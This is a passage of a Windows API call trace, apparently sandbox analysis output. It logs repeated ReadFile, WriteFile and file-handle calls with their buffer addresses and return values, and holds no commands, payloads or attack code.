nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.871] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.872] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.873] GetFileType (hFile=0x50) returned 0x1 [0119.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.873] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.873] GetFileType (hFile=0x50) returned 0x1 [0119.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.873] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.873] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.873] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.873] GetFileType (hFile=0x50) returned 0x1 [0119.873] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.873] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, 